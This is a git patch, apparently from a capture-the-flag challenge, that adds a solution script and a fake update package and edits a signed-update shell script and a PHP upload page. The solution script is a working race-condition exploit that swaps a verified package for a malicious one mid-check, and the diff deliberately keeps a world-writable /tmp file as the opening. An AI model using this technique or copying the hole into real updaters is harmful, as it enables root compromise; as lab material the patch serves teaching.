From efef6c0a2d6370a9918c0369a5cc6a23f354d783 Mon Sep 17 00:00:00 2001 From: Giulio Date: Thu, 24 Sep 2020 01:02:27 +0200 Subject: [PATCH] Update.sh does work; added complete solutions --- solution/exploit.sh | 16 ++++++++++++++++ solution/update.tar.cc | Bin 0 -> 10240 bytes update/update.sh | 13 ++++++------- webpanel/update.php | 7 ++++--- 4 files changed, 26 insertions(+), 10 deletions(-) create mode 100644 solution/exploit.sh create mode 100644 solution/update.tar.cc diff --git a/solution/exploit.sh b/solution/exploit.sh new file mode 100644 index 0000000..8db813c --- /dev/null +++ b/solution/exploit.sh @@ -0,0 +1,16 @@ +#!/bin/sh + +# The solution require the original update.tar.cc in /tmp named 'orig' +# and the fake package renamed to 'pwn' in /tmp. Both need to have chmod 777 + +cd /tmp; +cp orig update.tar.cc; +chmod 777 update.tar.cc; +sudo -u upgrade /bin/sh /update.sh > log & +while true; do + if [[ "$(cat log | grep Checking)" ]]; then + sleep 0.01 + cp pwn update.tar.cc; + fi +done; + diff --git a/solution/update.tar.cc b/solution/update.tar.cc new file mode 100644 index 0000000000000000000000000000000000000000..4909928abfa464def08bb7a33155009f97309b02 GIT binary patch literal 10240 zcmeIyO>crQ90qXC`xM+4CoPofVaX6pBn~zWG0J7ZL8vb%@{$Zc{a|sKW?9@pmn=U2 zOKIA)&F^Uun>cJ1NtF6Q*px0)N>!XOscHykWZ%-d{Va*7T&0|Fs;iPhRF$Zb%r0}B z<5i0+_fuJx_6Em;2fb6{2UGvkr#Q_2F3ZFPE)@QjDEfUkNm5D0g+_o411qk;>zED_!?w>BNIMttmj#t zP^Qa9RXsXhczs7aPMpouwenfK+68^1blhn@Y#sMIolcLM?SU3WPTAELYi8wqH5?RM zZn~bU#qDu05>IWL&#lN_s?FQ9)wK=J2xe<-VNKphX}Y7~Djwd; z(LyaQ9jhDQJZ literal 0 HcmV?d00001 diff --git a/update/update.sh b/update/update.sh index 1e141bd..efdffc4 100755 --- a/update/update.sh +++ b/update/update.sh @@ -13,30 +13,29 @@ if [[ "$auth" != "$password" ]]; then exit 1 fi - pubkey="/pub.pem" file="/tmp/update.tar.cc" -/bin/chmod 777 $file +sig="/tmp/sig" /bin/echo "### ccOS Update Script ###" /bin/echo "[+] Starting" -/bin/sleep 1 /bin/echo "[+] Extracting Signature" skip=$(expr $(stat -c '%s' $file) - 256) if [[ -L $file ]] then exit 0 fi -/bin/dd if=/tmp/update.tar.cc of=sig bs=1 count=256 skip=$skip +/bin/dd if=/tmp/update.tar.cc of=$sig bs=1 count=256 skip=$skip /usr/bin/truncate -s $skip $file -check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature /tmp/sig $file` +/bin/echo "[+] Checking Signature" +check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature $sig $file` if [ "$check" == "Verified OK" ] then /bin/echo "[+] Signature is valid!" /bin/echo "[+] Upgrading..." /bin/tar -xvf $file -C / - /bin/rm /tmp/sig + /bin/rm $sig /bin/echo "[+] Done" else /bin/echo "[-] Signature error, exiting..." - /bin/rm /tmp/sig + /bin/rm $sig fi diff --git a/webpanel/update.php b/webpanel/update.php index 95a0bdb..0f3bd43 100644 --- a/webpanel/update.php +++ b/webpanel/update.php @@ -5,8 +5,9 @@ require_once("includes/header.php"); require_once("includes/nav.php"); if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000 && isset($_POST['password']) && !empty($_POST['password'])) { - move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tgz.cc'); - exec("/usr/bin/sudo key='".escapeshellarg($_POST['password'])."' /update.sh", $result); + move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tar.cc'); + exec("/bin/chmod 777 /tmp/update.tar.cc"); + exec("key='".escapeshellarg($_POST['password'])."' /bin/sh -c '/usr/bin/sudo /bin/sh /update.sh'", $result); } ?> @@ -19,7 +20,7 @@ if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['

    -
  • Please select the file ccOS-ver-xxxx.tgz.cc
    • +
  • Please select the file update.tar.cc
  • The update will take about 2 minutes
  • Updates are cryptographically signed for integrity and authenticity